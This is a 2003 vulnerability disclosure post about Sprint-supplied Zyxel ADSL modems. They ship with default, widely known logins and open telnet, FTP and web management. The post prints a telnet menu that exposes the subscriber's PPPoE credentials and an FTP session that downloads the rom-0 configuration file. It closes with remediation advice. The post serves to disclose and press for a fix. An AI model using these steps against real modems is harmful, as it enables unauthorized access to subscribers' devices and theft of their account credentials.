Thursday, January 23 2003 Sprint FastConnect[insert little registration r here]ADSL provides the Zyxel series of modem/routers to their customers. The problem is all these devices are factory set with default commonly known passwords and logins and include a little http, ftp and telnet server. This allows for remote configuration of the network settings and host of other things. Including uploading and downloading the modem configuration file rom-0, rebooting the modem, changing the modem's remote management login and password, various other "high- tech" fiddling possibilities. Through both telnet and web. Certainly not of interest or of need to your generic subscriber. Quick pretend examination of: Sprint NETBLK-SPRINTBLK (NET-198-67-0-0-1) 198.67.0.0 - 198.70.255.255 LTD SPRINT FLA ANS ISP FON-332652953698729 (NET-198-70-208-0-1) 198.70.208.0 - 198.70.223.255 shows 800 out of 2000 [of 100,000 or so] affected modems. Closer examination confirms: Copyright (c) 1994 - 2002 ZyXEL Communications Corp. P645ME+ Main Menu Getting Started Advanced Management 1. General Setup 21. Filter Set Configuration 3. Ethernet Setup 22. SNMP Configuration 4. Internet Access Setup 23. System Password 24. System Maintenance 25. IP Routing Policy Setup Advanced Applications 26. Schedule Setup 11. Remote Node Setup 12. Static Routing Setup 15. SUA Server Setup 99. Exit Enter Menu Selection Number: punching in on our replica modem, number four [4], we get: Menu 4 - Internet Access Setup ISP's Name= MyISP Encapsulation= PPPoE Multiplexing= LLC-based VPI #= 8 VCI #= 35 Service Name= My Login= grandpamalware@malware.com My Password= ******** Single User Account= Yes IP Address Assignment= Dynamic IP Address= N/A ENET ENCAP Gateway= N/A Press ENTER to Confirm or ESC to Cancel: Press ENTER to Confirm or ESC to Cancel: Playing with our replica modem a bit more we GET: ftp> open malware.com Connected to malware.com. 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000 User (malware.com:(none)): 331 Enter PASS command Password: 230 Logged in ftp> get rom-0 200 Port command okay 150 Opening data connection for RETR rom-0 226 File sent OK ftp: 16384 bytes received in 2.03Seconds 8.07Kbytes/sec. ftp> Due to our modem only being a replica, we are unable to determine whether uploading our custom crafted rom-0 file from our second replica modem to our first, will (a) register the user data from there to there inclusive of user name and password and or (b) overwrite the configuration file in such a way our modem then becomes useless. But without a doubt, we are not happy to see Grandpappy's private email address out in the open for the whole world to see. Notes: 1. The provider suggests that slapping up a web page with instructions to disable this "feature" will be the solution. We would suggest fire-walling off the entire affected user base ftp, http and telnet ports, rolling out the trucks, physically reconfiguring each and every affected subscriber's modem or replacing them 2. PRIVACY PRIVACY PRIVACY. In this day and age, it is all we have left ! 3. http://www.wired.com/news/infostructure/0,1377,57342,00.html 4. Victims of this contact your provider asa possible and have them hand-hold you through disabling this "feature". Better yet, insist they send over the installer to do it for you. After all it should have been done at time of installation. End Call -- http://www.malware.com